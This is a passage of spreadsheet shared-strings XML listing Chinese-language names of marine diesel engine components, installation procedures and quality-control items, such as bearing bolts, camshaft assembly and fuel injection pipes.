      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导轨安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承盖螺栓上紧质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部导轨安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵柱塞套筒质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管系串洗指导</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手动液压泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀测试设备质量规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>串油</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座侧向支撑块安装指导</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统串油</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座铰刀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩补偿器安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座调平指导</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承首次供应质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座下料图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架下料清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座加工图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座焊接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接机座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压螺帽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金轴瓦标记</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涂层工艺</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涂层浇铸工艺</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向震动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承滑油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢管，外径</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>0-5</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链防护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架机加工</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>门框</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁钢（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>30-39mm)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹管接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放管安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船级社要求</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角螺柱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外径</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>0-50</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却油</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带孔螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <t>RHS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封圈槽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆形密封材料</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>包装材料</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖螺柱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封圈</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无胶</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧配凸圆头螺钉</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸滑油系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞清洁环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单向阀头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆螺柱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直螺纹连接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮加工</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆及十字头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油及冷却油</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量调节螺塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>金属胶</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带止动的六角螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金滑块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊头螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角法兰螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>额外重量</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带证书的钢管</t>
    </r>
  </si>
  <si>
    <r>
      <t>D</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑动轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>右旋弹簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外径</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>50-100</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆分式衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弯头连接件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴，钻孔</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块毛坯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装配螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功凸轮模板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子式注油器接线</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>多芯电缆，双绞线</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆槽布置</t>
    </r>
  </si>
  <si>
    <r>
      <t>U</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形剖面</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公螺纹接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁钢</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 5-9mm</t>
    </r>
  </si>
  <si>
    <r>
      <t>U</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形管压力表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扶手附件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端子排</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘头螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油含水监测</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油含水监测系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶件支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承磨损检测系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承磨损监测</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆槽附件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角头自攻螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气系统调整</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>梯形螺纹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>梯形螺纹公差</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>左旋弹簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压燃油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压燃油弯管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油高压双璧管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
